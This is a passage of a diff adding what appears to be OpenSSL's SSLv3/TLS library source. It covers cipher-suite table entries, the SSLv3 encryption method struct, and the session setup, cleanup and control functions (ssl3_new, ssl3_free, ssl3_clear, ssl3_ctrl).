+     TLS1_CK_ECDH_ECDSA_WITH_AES_128_SHA256,
+     SSL_kECDHe,
+     SSL_aECDH,
+     SSL_AES128,
+     SSL_SHA256,
+     SSL_TLSV1_2,
+     SSL_NOT_EXP | SSL_HIGH | SSL_FIPS,
+     SSL_HANDSHAKE_MAC_SHA256 | TLS1_PRF_SHA256,
+     128,
+     128,
+     },
+
+    /* Cipher C026 */
+    {
+     1,
+     TLS1_TXT_ECDH_ECDSA_WITH_AES_256_SHA384,
+     TLS1_CK_ECDH_ECDSA_WITH_AES_256_SHA384,
+     SSL_kECDHe,
+     SSL_aECDH,
+     SSL_AES256,
+     SSL_SHA384,
+     SSL_TLSV1_2,
+     SSL_NOT_EXP | SSL_HIGH | SSL_FIPS,
+     SSL_HANDSHAKE_MAC_SHA384 | TLS1_PRF_SHA384,
+     256,
+     256,
+     },
+
+    /* Cipher C027 */
+    {
+     1,
+     TLS1_TXT_ECDHE_RSA_WITH_AES_128_SHA256,
+     TLS1_CK_ECDHE_RSA_WITH_AES_128_SHA256,
+     SSL_kEECDH,
+     SSL_aRSA,
+     SSL_AES128,
+     SSL_SHA256,
+     SSL_TLSV1_2,
+     SSL_NOT_EXP | SSL_HIGH | SSL_FIPS,
+     SSL_HANDSHAKE_MAC_SHA256 | TLS1_PRF_SHA256,
+     128,
+     128,
+     },
+
+    /* Cipher C028 */
+    {
+     1,
+     TLS1_TXT_ECDHE_RSA_WITH_AES_256_SHA384,
+     TLS1_CK_ECDHE_RSA_WITH_AES_256_SHA384,
+     SSL_kEECDH,
+     SSL_aRSA,
+     SSL_AES256,
+     SSL_SHA384,
+     SSL_TLSV1_2,
+     SSL_NOT_EXP | SSL_HIGH | SSL_FIPS,
+     SSL_HANDSHAKE_MAC_SHA384 | TLS1_PRF_SHA384,
+     256,
+     256,
+     },
+
+    /* Cipher C029 */
+    {
+     1,
+     TLS1_TXT_ECDH_RSA_WITH_AES_128_SHA256,
+     TLS1_CK_ECDH_RSA_WITH_AES_128_SHA256,
+     SSL_kECDHr,
+     SSL_aECDH,
+     SSL_AES128,
+     SSL_SHA256,
+     SSL_TLSV1_2,
+     SSL_NOT_EXP | SSL_HIGH | SSL_FIPS,
+     SSL_HANDSHAKE_MAC_SHA256 | TLS1_PRF_SHA256,
+     128,
+     128,
+     },
+
+    /* Cipher C02A */
+    {
+     1,
+     TLS1_TXT_ECDH_RSA_WITH_AES_256_SHA384,
+     TLS1_CK_ECDH_RSA_WITH_AES_256_SHA384,
+     SSL_kECDHr,
+     SSL_aECDH,
+     SSL_AES256,
+     SSL_SHA384,
+     SSL_TLSV1_2,
+     SSL_NOT_EXP | SSL_HIGH | SSL_FIPS,
+     SSL_HANDSHAKE_MAC_SHA384 | TLS1_PRF_SHA384,
+     256,
+     256,
+     },
+
+    /* GCM based TLS v1.2 ciphersuites from RFC5289 */
+
+    /* Cipher C02B */
+    {
+     1,
+     TLS1_TXT_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256,
+     TLS1_CK_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256,
+     SSL_kEECDH,
+     SSL_aECDSA,
+     SSL_AES128GCM,
+     SSL_AEAD,
+     SSL_TLSV1_2,
+     SSL_NOT_EXP | SSL_HIGH | SSL_FIPS,
+     SSL_HANDSHAKE_MAC_SHA256 | TLS1_PRF_SHA256,
+     128,
+     128,
+     },
+
+    /* Cipher C02C */
+    {
+     1,
+     TLS1_TXT_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384,
+     TLS1_CK_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384,
+     SSL_kEECDH,
+     SSL_aECDSA,
+     SSL_AES256GCM,
+     SSL_AEAD,
+     SSL_TLSV1_2,
+     SSL_NOT_EXP | SSL_HIGH | SSL_FIPS,
+     SSL_HANDSHAKE_MAC_SHA384 | TLS1_PRF_SHA384,
+     256,
+     256,
+     },
+
+    /* Cipher C02D */
+    {
+     1,
+     TLS1_TXT_ECDH_ECDSA_WITH_AES_128_GCM_SHA256,
+     TLS1_CK_ECDH_ECDSA_WITH_AES_128_GCM_SHA256,
+     SSL_kECDHe,
+     SSL_aECDH,
+     SSL_AES128GCM,
+     SSL_AEAD,
+     SSL_TLSV1_2,
+     SSL_NOT_EXP | SSL_HIGH | SSL_FIPS,
+     SSL_HANDSHAKE_MAC_SHA256 | TLS1_PRF_SHA256,
+     128,
+     128,
+     },
+
+    /* Cipher C02E */
+    {
+     1,
+     TLS1_TXT_ECDH_ECDSA_WITH_AES_256_GCM_SHA384,
+     TLS1_CK_ECDH_ECDSA_WITH_AES_256_GCM_SHA384,
+     SSL_kECDHe,
+     SSL_aECDH,
+     SSL_AES256GCM,
+     SSL_AEAD,
+     SSL_TLSV1_2,
+     SSL_NOT_EXP | SSL_HIGH | SSL_FIPS,
+     SSL_HANDSHAKE_MAC_SHA384 | TLS1_PRF_SHA384,
+     256,
+     256,
+     },
+
+    /* Cipher C02F */
+    {
+     1,
+     TLS1_TXT_ECDHE_RSA_WITH_AES_128_GCM_SHA256,
+     TLS1_CK_ECDHE_RSA_WITH_AES_128_GCM_SHA256,
+     SSL_kEECDH,
+     SSL_aRSA,
+     SSL_AES128GCM,
+     SSL_AEAD,
+     SSL_TLSV1_2,
+     SSL_NOT_EXP | SSL_HIGH | SSL_FIPS,
+     SSL_HANDSHAKE_MAC_SHA256 | TLS1_PRF_SHA256,
+     128,
+     128,
+     },
+
+    /* Cipher C030 */
+    {
+     1,
+     TLS1_TXT_ECDHE_RSA_WITH_AES_256_GCM_SHA384,
+     TLS1_CK_ECDHE_RSA_WITH_AES_256_GCM_SHA384,
+     SSL_kEECDH,
+     SSL_aRSA,
+     SSL_AES256GCM,
+     SSL_AEAD,
+     SSL_TLSV1_2,
+     SSL_NOT_EXP | SSL_HIGH | SSL_FIPS,
+     SSL_HANDSHAKE_MAC_SHA384 | TLS1_PRF_SHA384,
+     256,
+     256,
+     },
+
+    /* Cipher C031 */
+    {
+     1,
+     TLS1_TXT_ECDH_RSA_WITH_AES_128_GCM_SHA256,
+     TLS1_CK_ECDH_RSA_WITH_AES_128_GCM_SHA256,
+     SSL_kECDHr,
+     SSL_aECDH,
+     SSL_AES128GCM,
+     SSL_AEAD,
+     SSL_TLSV1_2,
+     SSL_NOT_EXP | SSL_HIGH | SSL_FIPS,
+     SSL_HANDSHAKE_MAC_SHA256 | TLS1_PRF_SHA256,
+     128,
+     128,
+     },
+
+    /* Cipher C032 */
+    {
+     1,
+     TLS1_TXT_ECDH_RSA_WITH_AES_256_GCM_SHA384,
+     TLS1_CK_ECDH_RSA_WITH_AES_256_GCM_SHA384,
+     SSL_kECDHr,
+     SSL_aECDH,
+     SSL_AES256GCM,
+     SSL_AEAD,
+     SSL_TLSV1_2,
+     SSL_NOT_EXP | SSL_HIGH | SSL_FIPS,
+     SSL_HANDSHAKE_MAC_SHA384 | TLS1_PRF_SHA384,
+     256,
+     256,
+     },
+
+#endif                          /* OPENSSL_NO_ECDH */
+
+#ifdef TEMP_GOST_TLS
+/* Cipher FF00 */
+    {
+     1,
+     "GOST-MD5",
+     0x0300ff00,
+     SSL_kRSA,
+     SSL_aRSA,
+     SSL_eGOST2814789CNT,
+     SSL_MD5,
+     SSL_TLSV1,
+     SSL_NOT_EXP | SSL_HIGH,
+     SSL_HANDSHAKE_MAC_DEFAULT | TLS1_PRF,
+     256,
+     256,
+     },
+    {
+     1,
+     "GOST-GOST94",
+     0x0300ff01,
+     SSL_kRSA,
+     SSL_aRSA,
+     SSL_eGOST2814789CNT,
+     SSL_GOST94,
+     SSL_TLSV1,
+     SSL_NOT_EXP | SSL_HIGH,
+     SSL_HANDSHAKE_MAC_DEFAULT | TLS1_PRF,
+     256,
+     256},
+    {
+     1,
+     "GOST-GOST89MAC",
+     0x0300ff02,
+     SSL_kRSA,
+     SSL_aRSA,
+     SSL_eGOST2814789CNT,
+     SSL_GOST89MAC,
+     SSL_TLSV1,
+     SSL_NOT_EXP | SSL_HIGH,
+     SSL_HANDSHAKE_MAC_DEFAULT | TLS1_PRF,
+     256,
+     256},
+    {
+     1,
+     "GOST-GOST89STREAM",
+     0x0300ff03,
+     SSL_kRSA,
+     SSL_aRSA,
+     SSL_eGOST2814789CNT,
+     SSL_GOST89MAC,
+     SSL_TLSV1,
+     SSL_NOT_EXP | SSL_HIGH,
+     SSL_HANDSHAKE_MAC_DEFAULT | TLS1_PRF | TLS1_STREAM_MAC,
+     256,
+     256},
+#endif
+
+/* end of list */
+};
+
+SSL3_ENC_METHOD SSLv3_enc_data = {
+    ssl3_enc,
+    n_ssl3_mac,
+    ssl3_setup_key_block,
+    ssl3_generate_master_secret,
+    ssl3_change_cipher_state,
+    ssl3_final_finish_mac,
+    MD5_DIGEST_LENGTH + SHA_DIGEST_LENGTH,
+    ssl3_cert_verify_mac,
+    SSL3_MD_CLIENT_FINISHED_CONST, 4,
+    SSL3_MD_SERVER_FINISHED_CONST, 4,
+    ssl3_alert_code,
+    (int (*)(SSL *, unsigned char *, size_t, const char *,
+             size_t, const unsigned char *, size_t,
+             int use_context))ssl_undefined_function,
+    0,
+    SSL3_HM_HEADER_LENGTH,
+    ssl3_set_handshake_header,
+    ssl3_handshake_write
+};
+
+long ssl3_default_timeout(void)
+{
+    /*
+     * 2 hours, the 24 hours mentioned in the SSLv3 spec is way too long for
+     * http, the cache would over fill
+     */
+    return (60 * 60 * 2);
+}
+
+int ssl3_num_ciphers(void)
+{
+    return (SSL3_NUM_CIPHERS);
+}
+
+const SSL_CIPHER *ssl3_get_cipher(unsigned int u)
+{
+    if (u < SSL3_NUM_CIPHERS)
+        return (&(ssl3_ciphers[SSL3_NUM_CIPHERS - 1 - u]));
+    else
+        return (NULL);
+}
+
+int ssl3_pending(const SSL *s)
+{
+    if (s->rstate == SSL_ST_READ_BODY)
+        return 0;
+
+    return (s->s3->rrec.type ==
+            SSL3_RT_APPLICATION_DATA) ? s->s3->rrec.length : 0;
+}
+
+void ssl3_set_handshake_header(SSL *s, int htype, unsigned long len)
+{
+    unsigned char *p = (unsigned char *)s->init_buf->data;
+    *(p++) = htype;
+    l2n3(len, p);
+    s->init_num = (int)len + SSL3_HM_HEADER_LENGTH;
+    s->init_off = 0;
+}
+
+int ssl3_handshake_write(SSL *s)
+{
+    return ssl3_do_write(s, SSL3_RT_HANDSHAKE);
+}
+
+int ssl3_new(SSL *s)
+{
+    SSL3_STATE *s3;
+
+    if ((s3 = OPENSSL_malloc(sizeof *s3)) == NULL)
+        goto err;
+    memset(s3, 0, sizeof *s3);
+    memset(s3->rrec.seq_num, 0, sizeof(s3->rrec.seq_num));
+    memset(s3->wrec.seq_num, 0, sizeof(s3->wrec.seq_num));
+
+    s->s3 = s3;
+
+#ifndef OPENSSL_NO_SRP
+    SSL_SRP_CTX_init(s);
+#endif
+    s->method->ssl_clear(s);
+    return (1);
+ err:
+    return (0);
+}
+
+void ssl3_free(SSL *s)
+{
+    if (s == NULL)
+        return;
+
+#ifdef TLSEXT_TYPE_opaque_prf_input
+    if (s->s3->client_opaque_prf_input != NULL)
+        OPENSSL_free(s->s3->client_opaque_prf_input);
+    if (s->s3->server_opaque_prf_input != NULL)
+        OPENSSL_free(s->s3->server_opaque_prf_input);
+#endif
+
+    ssl3_cleanup_key_block(s);
+    if (s->s3->rbuf.buf != NULL)
+        ssl3_release_read_buffer(s);
+    if (s->s3->wbuf.buf != NULL)
+        ssl3_release_write_buffer(s);
+    if (s->s3->rrec.comp != NULL)
+        OPENSSL_free(s->s3->rrec.comp);
+#ifndef OPENSSL_NO_DH
+    if (s->s3->tmp.dh != NULL)
+        DH_free(s->s3->tmp.dh);
+#endif
+#ifndef OPENSSL_NO_ECDH
+    if (s->s3->tmp.ecdh != NULL)
+        EC_KEY_free(s->s3->tmp.ecdh);
+#endif
+
+    if (s->s3->tmp.ca_names != NULL)
+        sk_X509_NAME_pop_free(s->s3->tmp.ca_names, X509_NAME_free);
+    if (s->s3->handshake_buffer) {
+        BIO_free(s->s3->handshake_buffer);
+    }
+    if (s->s3->handshake_dgst)
+        ssl3_free_digest_list(s);
+#ifndef OPENSSL_NO_TLSEXT
+    if (s->s3->alpn_selected)
+        OPENSSL_free(s->s3->alpn_selected);
+#endif
+
+#ifndef OPENSSL_NO_SRP
+    SSL_SRP_CTX_free(s);
+#endif
+    OPENSSL_cleanse(s->s3, sizeof *s->s3);
+    OPENSSL_free(s->s3);
+    s->s3 = NULL;
+}
+
+void ssl3_clear(SSL *s)
+{
+    unsigned char *rp, *wp;
+    size_t rlen, wlen;
+    int init_extra;
+
+#ifdef TLSEXT_TYPE_opaque_prf_input
+    if (s->s3->client_opaque_prf_input != NULL)
+        OPENSSL_free(s->s3->client_opaque_prf_input);
+    s->s3->client_opaque_prf_input = NULL;
+    if (s->s3->server_opaque_prf_input != NULL)
+        OPENSSL_free(s->s3->server_opaque_prf_input);
+    s->s3->server_opaque_prf_input = NULL;
+#endif
+
+    ssl3_cleanup_key_block(s);
+    if (s->s3->tmp.ca_names != NULL)
+        sk_X509_NAME_pop_free(s->s3->tmp.ca_names, X509_NAME_free);
+
+    if (s->s3->rrec.comp != NULL) {
+        OPENSSL_free(s->s3->rrec.comp);
+        s->s3->rrec.comp = NULL;
+    }
+#ifndef OPENSSL_NO_DH
+    if (s->s3->tmp.dh != NULL) {
+        DH_free(s->s3->tmp.dh);
+        s->s3->tmp.dh = NULL;
+    }
+#endif
+#ifndef OPENSSL_NO_ECDH
+    if (s->s3->tmp.ecdh != NULL) {
+        EC_KEY_free(s->s3->tmp.ecdh);
+        s->s3->tmp.ecdh = NULL;
+    }
+#endif
+#ifndef OPENSSL_NO_TLSEXT
+# ifndef OPENSSL_NO_EC
+    s->s3->is_probably_safari = 0;
+# endif                         /* !OPENSSL_NO_EC */
+#endif                          /* !OPENSSL_NO_TLSEXT */
+
+    rp = s->s3->rbuf.buf;
+    wp = s->s3->wbuf.buf;
+    rlen = s->s3->rbuf.len;
+    wlen = s->s3->wbuf.len;
+    init_extra = s->s3->init_extra;
+    if (s->s3->handshake_buffer) {
+        BIO_free(s->s3->handshake_buffer);
+        s->s3->handshake_buffer = NULL;
+    }
+    if (s->s3->handshake_dgst) {
+        ssl3_free_digest_list(s);
+    }
+#if !defined(OPENSSL_NO_TLSEXT)
+    if (s->s3->alpn_selected) {
+        free(s->s3->alpn_selected);
+        s->s3->alpn_selected = NULL;
+    }
+#endif
+    memset(s->s3, 0, sizeof *s->s3);
+    s->s3->rbuf.buf = rp;
+    s->s3->wbuf.buf = wp;
+    s->s3->rbuf.len = rlen;
+    s->s3->wbuf.len = wlen;
+    s->s3->init_extra = init_extra;
+
+    ssl_free_wbio_buffer(s);
+
+    s->packet_length = 0;
+    s->s3->renegotiate = 0;
+    s->s3->total_renegotiations = 0;
+    s->s3->num_renegotiations = 0;
+    s->s3->in_read_app_data = 0;
+    s->version = SSL3_VERSION;
+
+#if !defined(OPENSSL_NO_TLSEXT) && !defined(OPENSSL_NO_NEXTPROTONEG)
+    if (s->next_proto_negotiated) {
+        OPENSSL_free(s->next_proto_negotiated);
+        s->next_proto_negotiated = NULL;
+        s->next_proto_negotiated_len = 0;
+    }
+#endif
+}
+
+#ifndef OPENSSL_NO_SRP
+static char *MS_CALLBACK srp_password_from_info_cb(SSL *s, void *arg)
+{
+    return BUF_strdup(s->srp_ctx.info);
+}
+#endif
+
+static int ssl3_set_req_cert_type(CERT *c, const unsigned char *p,
+                                  size_t len);
+
+long ssl3_ctrl(SSL *s, int cmd, long larg, void *parg)
+{
+    int ret = 0;
+
+#if !defined(OPENSSL_NO_DSA) || !defined(OPENSSL_NO_RSA)
+    if (
+# ifndef OPENSSL_NO_RSA
+           cmd == SSL_CTRL_SET_TMP_RSA || cmd == SSL_CTRL_SET_TMP_RSA_CB ||
+# endif
+# ifndef OPENSSL_NO_DSA
+           cmd == SSL_CTRL_SET_TMP_DH || cmd == SSL_CTRL_SET_TMP_DH_CB ||
+# endif
+           0) {
+        if (!ssl_cert_inst(&s->cert)) {
+            SSLerr(SSL_F_SSL3_CTRL, ERR_R_MALLOC_FAILURE);
+            return (0);
+        }
+    }
+#endif
+
+    switch (cmd) {
+    case SSL_CTRL_GET_SESSION_REUSED:
+        ret = s->hit;
+        break;
+    case SSL_CTRL_GET_CLIENT_CERT_REQUEST:
+        break;
+    case SSL_CTRL_GET_NUM_RENEGOTIATIONS:
+        ret = s->s3->num_renegotiations;
+        break;
+    case SSL_CTRL_CLEAR_NUM_RENEGOTIATIONS:
+        ret = s->s3->num_renegotiations;
+        s->s3->num_renegotiations = 0;
+        break;
+    case SSL_CTRL_GET_TOTAL_RENEGOTIATIONS:
+        ret = s->s3->total_renegotiations;
+        break;
+    case SSL_CTRL_GET_FLAGS:
+        ret = (int)(s->s3->flags);
+        break;
+#ifndef OPENSSL_NO_RSA
+    case SSL_CTRL_NEED_TMP_RSA:
+        if ((s->cert != NULL) && (s->cert->rsa_tmp == NULL) &&
+            ((s->cert->pkeys[SSL_PKEY_RSA_ENC].privatekey == NULL) ||
+             (EVP_PKEY_size(s->cert->pkeys[SSL_PKEY_RSA_ENC].privatekey) >
+              (512 / 8))))
+            ret = 1;
+        break;
+    case SSL_CTRL_SET_TMP_RSA:
+        {
+            RSA *rsa = (RSA *)parg;
+            if (rsa == NULL) {
+                SSLerr(SSL_F_SSL3_CTRL, ERR_R_PASSED_NULL_PARAMETER);
+                return (ret);
+            }
+            if ((rsa = RSAPrivateKey_dup(rsa)) == NULL) {
+                SSLerr(SSL_F_SSL3_CTRL, ERR_R_RSA_LIB);
+                return (ret);
+            }
+            if (s->cert->rsa_tmp != NULL)
+                RSA_free(s->cert->rsa_tmp);
+            s->cert->rsa_tmp = rsa;
+            ret = 1;
+        }
+        break;
+    case SSL_CTRL_SET_TMP_RSA_CB:
+        {
+            SSLerr(SSL_F_SSL3_CTRL, ERR_R_SHOULD_NOT_HAVE_BEEN_CALLED);
+            return (ret);
+        }
+        break;
+#endif
+#ifndef OPENSSL_NO_DH
+    case SSL_CTRL_SET_TMP_DH:
+        {
+            DH *dh = (DH *)parg;
+            if (dh == NULL) {
+                SSLerr(SSL_F_SSL3_CTRL, ERR_R_PASSED_NULL_PARAMETER);
+                return (ret);
+            }
+            if ((dh = DHparams_dup(dh)) == NULL) {
+                SSLerr(SSL_F_SSL3_CTRL, ERR_R_DH_LIB);
+                return (ret);
+            }
+            if (!(s->options & SSL_OP_SINGLE_DH_USE)) {
+                if (!DH_generate_key(dh)) {
+                    DH_free(dh);
+                    SSLerr(SSL_F_SSL3_CTRL, ERR_R_DH_LIB);
+                    return (ret);
+                }
+            }
+            if (s->cert->dh_tmp != NULL)
+                DH_free(s->cert->dh_tmp);
+            s->cert->dh_tmp = dh;
+            ret = 1;
+        }
+        break;
+    case SSL_CTRL_SET_TMP_DH_CB:
+        {
+            SSLerr(SSL_F_SSL3_CTRL, ERR_R_SHOULD_NOT_HAVE_BEEN_CALLED);
+            return (ret);
+        }
+        break;
+#endif
+#ifndef OPENSSL_NO_ECDH
+    case SSL_CTRL_SET_TMP_ECDH:
+        {
+            EC_KEY *ecdh = NULL;
+
+            if (parg == NULL) {
+                SSLerr(SSL_F_SSL3_CTRL, ERR_R_PASSED_NULL_PARAMETER);
+                return (ret);
+            }
+            if (!EC_KEY_up_ref((EC_KEY *)parg)) {
+                SSLerr(SSL_F_SSL3_CTRL, ERR_R_ECDH_LIB);
+                return (ret);
+            }
+            ecdh = (EC_KEY *)parg;
+            if (!(s->options & SSL_OP_SINGLE_ECDH_USE)) {
+                if (!EC_KEY_generate_key(ecdh)) {
+                    EC_KEY_free(ecdh);
+                    SSLerr(SSL_F_SSL3_CTRL, ERR_R_ECDH_LIB);
+                    return (ret);
+                }
+            }
+            if (s->cert->ecdh_tmp != NULL)
+                EC_KEY_free(s->cert->ecdh_tmp);
+            s->cert->ecdh_tmp = ecdh;
+            ret = 1;
+        }
+        break;
+    case SSL_CTRL_SET_TMP_ECDH_CB:
+        {
+            SSLerr(SSL_F_SSL3_CTRL, ERR_R_SHOULD_NOT_HAVE_BEEN_CALLED);
+            return (ret);
+        }
+        break;
+#endif                          /* !OPENSSL_NO_ECDH */
+#ifndef OPENSSL_NO_TLSEXT
+    case SSL_CTRL_SET_TLSEXT_HOSTNAME:
+        if (larg == TLSEXT_NAMETYPE_host_name) {
+            if (s->tlsext_hostname != NULL)
+                OPENSSL_free(s->tlsext_hostname);
+            s->tlsext_hostname = NULL;
+
+            ret = 1;
+            if (parg == NULL)
+                break;
+            if (strlen((char *)parg) > TLSEXT_MAXLEN_host_name) {
+                SSLerr(SSL_F_SSL3_CTRL, SSL_R_SSL3_EXT_INVALID_SERVERNAME);
+                return 0;
+            }
+            if ((s->tlsext_hostname = BUF_strdup((char *)parg)) == NULL) {
+                SSLerr(SSL_F_SSL3_CTRL, ERR_R_INTERNAL_ERROR);
+                return 0;
+            }
+        } else {
+            SSLerr(SSL_F_SSL3_CTRL, SSL_R_SSL3_EXT_INVALID_SERVERNAME_TYPE);
+            return 0;
+        }
+        break;
+    case SSL_CTRL_SET_TLSEXT_DEBUG_ARG:
+        s->tlsext_debug_arg = parg;
+        ret = 1;
+        break;
+
+# ifdef TLSEXT_TYPE_opaque_prf_input
+    case SSL_CTRL_SET_TLSEXT_OPAQUE_PRF_INPUT:
+        if (larg > 12288) {     /* actual internal limit is 2^16 for the
+                                 * complete hello message * (including the
+                                 * cert chain and everything) */
+            SSLerr(SSL_F_SSL3_CTRL, SSL_R_OPAQUE_PRF_INPUT_TOO_LONG);
+            break;
+        }
+        if (s->tlsext_opaque_prf_input != NULL)
+            OPENSSL_free(s->tlsext_opaque_prf_input);
+        if ((size_t)larg == 0)
+            s->tlsext_opaque_prf_input = OPENSSL_malloc(1); /* dummy byte
+                                                             * just to get
+                                                             * non-NULL */
+        else
+            s->tlsext_opaque_prf_input = BUF_memdup(parg, (size_t)larg);
+        if (s->tlsext_opaque_prf_input != NULL) {
+            s->tlsext_opaque_prf_input_len = (size_t)larg;
+            ret = 1;
+        } else
+            s->tlsext_opaque_prf_input_len = 0;
+        break;
+# endif
+
+    case SSL_CTRL_SET_TLSEXT_STATUS_REQ_TYPE:
+        s->tlsext_status_type = larg;
+        ret = 1;
+        break;
+
+    case SSL_CTRL_GET_TLSEXT_STATUS_REQ_EXTS:
+        *(STACK_OF(X509_EXTENSION) **)parg = s->tlsext_ocsp_exts;
+        ret = 1;
+        break;
+
+    case SSL_CTRL_SET_TLSEXT_STATUS_REQ_EXTS:
+        s->tlsext_ocsp_exts = parg;
+        ret = 1;
+        break;
+
+    case SSL_CTRL_GET_TLSEXT_STATUS_REQ_IDS:
+        *(STACK_OF(OCSP_RESPID) **)parg = s->tlsext_ocsp_ids;
+        ret = 1;
+        break;
+
+    case SSL_CTRL_SET_TLSEXT_STATUS_REQ_IDS:
+        s->tlsext_ocsp_ids = parg;
+        ret = 1;
+        break;
+
+    case SSL_CTRL_GET_TLSEXT_STATUS_REQ_OCSP_RESP:
+        *(unsigned char **)parg = s->tlsext_ocsp_resp;
+        return s->tlsext_ocsp_resplen;
+
+    case SSL_CTRL_SET_TLSEXT_STATUS_REQ_OCSP_RESP:
+        if (s->tlsext_ocsp_resp)
+            OPENSSL_free(s->tlsext_ocsp_resp);
+        s->tlsext_ocsp_resp = parg;
+        s->tlsext_ocsp_resplen = larg;
+        ret = 1;
+        break;
+
+# ifndef OPENSSL_NO_HEARTBEATS
+    case SSL_CTRL_TLS_EXT_SEND_HEARTBEAT:
+        if (SSL_IS_DTLS(s))
+            ret = dtls1_heartbeat(s);
+        else
+            ret = tls1_heartbeat(s);
+        break;
+
+    case SSL_CTRL_GET_TLS_EXT_HEARTBEAT_PENDING:
+        ret = s->tlsext_hb_pending;
+        break;
+
+    case SSL_CTRL_SET_TLS_EXT_HEARTBEAT_NO_REQUESTS:
+        if (larg)
+            s->tlsext_heartbeat |= SSL_TLSEXT_HB_DONT_RECV_REQUESTS;
+        else
+            s->tlsext_heartbeat &= ~SSL_TLSEXT_HB_DONT_RECV_REQUESTS;
+        ret = 1;
+        break;
+# endif
+
+#endif                          /* !OPENSSL_NO_TLSEXT */
+
+    case SSL_CTRL_CHAIN:
+        if (larg)
+            return ssl_cert_set1_chain(s->cert, (STACK_OF(X509) *)parg);
+        else
+            return ssl_cert_set0_chain(s->cert, (STACK_OF(X509) *)parg);
+
+    case SSL_CTRL_CHAIN_CERT:
+        if (larg)
+            return ssl_cert_add1_chain_cert(s->cert, (X509 *)parg);
+        else
+            return ssl_cert_add0_chain_cert(s->cert, (X509 *)parg);
+
+    case SSL_CTRL_GET_CHAIN_CERTS:
+        *(STACK_OF(X509) **)parg = s->cert->key->chain;
+        break;
+
+    case SSL_CTRL_SELECT_CURRENT_CERT:
+        return ssl_cert_select_current(s->cert, (X509 *)parg);
+
+    case SSL_CTRL_SET_CURRENT_CERT:
+        if (larg == SSL_CERT_SET_SERVER) {
+            CERT_PKEY *cpk;
+            const SSL_CIPHER *cipher;
+            if (!s->server)
+                return 0;
+            cipher = s->s3->tmp.new_cipher;
+            if (!cipher)
+                return 0;
+            /*
+             * No certificate for unauthenticated ciphersuites or using SRP
+             * authentication
+             */
+            if (cipher->algorithm_auth & (SSL_aNULL | SSL_aSRP))
+                return 2;
+            cpk = ssl_get_server_send_pkey(s);
+            if (!cpk)
+                return 0;
+            s->cert->key = cpk;
+            return 1;
+        }
+        return ssl_cert_set_current(s->cert, larg);
+
+#ifndef OPENSSL_NO_EC
+    case SSL_CTRL_GET_CURVES:
+        {
+            unsigned char *clist;
+            size_t clistlen;
+            if (!s->session)
+                return 0;
+            clist = s->session->tlsext_ellipticcurvelist;
+            clistlen = s->session->tlsext_ellipticcurvelist_length / 2;
+            if (parg) {
+                size_t i;
+                int *cptr = parg;
+                unsigned int cid, nid;
+                for (i = 0; i < clistlen; i++) {
+                    n2s(clist, cid);
+                    nid = tls1_ec_curve_id2nid(cid);
+                    if (nid != 0)
+                        cptr[i] = nid;
+                    else
+                        cptr[i] = TLSEXT_nid_unknown | cid;
+                }
+            }
+            return (int)clistlen;
+        }
+
+    case SSL_CTRL_SET_CURVES:
+        return tls1_set_curves(&s->tlsext_ellipticcurvelist,
+                               &s->tlsext_ellipticcurvelist_length,
+                               parg, larg);
+
+    case SSL_CTRL_SET_CURVES_LIST:
+        return tls1_set_curves_list(&s->tlsext_ellipticcurvelist,
+                                    &s->tlsext_ellipticcurvelist_length,
+                                    parg);
+
+    case SSL_CTRL_GET_SHARED_CURVE:
+        return tls1_shared_curve(s, larg);
+
+# ifndef OPENSSL_NO_ECDH
+    case SSL_CTRL_SET_ECDH_AUTO:
+        s->cert->ecdh_tmp_auto = larg;
+        return 1;
+# endif
+#endif
+    case SSL_CTRL_SET_SIGALGS:
+        return tls1_set_sigalgs(s->cert, parg, larg, 0);
+
+    case SSL_CTRL_SET_SIGALGS_LIST:
+        return tls1_set_sigalgs_list(s->cert, parg, 0);
+
+    case SSL_CTRL_SET_CLIENT_SIGALGS:
+        return tls1_set_sigalgs(s->cert, parg, larg, 1);
+
+    case SSL_CTRL_SET_CLIENT_SIGALGS_LIST:
+        return tls1_set_sigalgs_list(s->cert, parg, 1);
+
+    case SSL_CTRL_GET_CLIENT_CERT_TYPES:
+        {
+            const unsigned char **pctype = parg;
+            if (s->server || !s->s3->tmp.cert_req)
+                return 0;
+            if (s->cert->ctypes) {
+                if (pctype)
+                    *pctype = s->cert->ctypes;
+                return (int)s->cert->ctype_num;
+            }
+            if (pctype)
+                *pctype = (unsigned char *)s->s3->tmp.ctype;
+            return s->s3->tmp.ctype_num;
+        }
+
+    case SSL_CTRL_SET_CLIENT_CERT_TYPES:
+        if (!s->server)
+            return 0;
+        return ssl3_set_req_cert_type(s->cert, parg, larg);
+
+    case SSL_CTRL_BUILD_CERT_CHAIN:
+        return ssl_build_cert_chain(s->cert, s->ctx->cert_store, larg);
+
+    case SSL_CTRL_SET_VERIFY_CERT_STORE:
+        return ssl_cert_set_cert_store(s->cert, parg, 0, larg);
+
+    case SSL_CTRL_SET_CHAIN_CERT_STORE:
+        return ssl_cert_set_cert_store(s->cert, parg, 1, larg);
+
+    case SSL_CTRL_GET_PEER_SIGNATURE_NID:
+        if (SSL_USE_SIGALGS(s)) {
+            if (s->session && s->session->sess_cert) {
+                const EVP_MD *sig;
+                sig = s->session->sess_cert->peer_key->digest;
+                if (sig) {
+                    *(int *)parg = EVP_MD_type(sig);
+                    return 1;
+                }
+            }
+            return 0;
+        }
+        /* Might want to do something here for other versions */
+        else
+            return 0;
+
+    case SSL_CTRL_GET_SERVER_TMP_KEY:
+        if (s->server || !s->session || !s->session->sess_cert)
+            return 0;
+        else {
+            SESS_CERT *sc;
+            EVP_PKEY *ptmp;
+            int rv = 0;
+            sc = s->session->sess_cert;
+#if !defined(OPENSSL_NO_RSA) && !defined(OPENSSL_NO_DH) && !defined(OPENSSL_NO_EC) && !defined(OPENSSL_NO_ECDH)
+            if (!sc->peer_rsa_tmp && !sc->peer_dh_tmp && !sc->peer_ecdh_tmp)
+                return 0;
+#endif
+            ptmp = EVP_PKEY_new();
+            if (!ptmp)
+                return 0;
+            if (0) ;
+#ifndef OPENSSL_NO_RSA
+            else if (sc->peer_rsa_tmp)
+                rv = EVP_PKEY_set1_RSA(ptmp, sc->peer_rsa_tmp);
+#endif
+#ifndef OPENSSL_NO_DH
+            else if (sc->peer_dh_tmp)
+                rv = EVP_PKEY_set1_DH(ptmp, sc->peer_dh_tmp);
+#endif
+#ifndef OPENSSL_NO_ECDH
+            else if (sc->peer_ecdh_tmp)
+                rv = EVP_PKEY_set1_EC_KEY(ptmp, sc->peer_ecdh_tmp);
+#endif
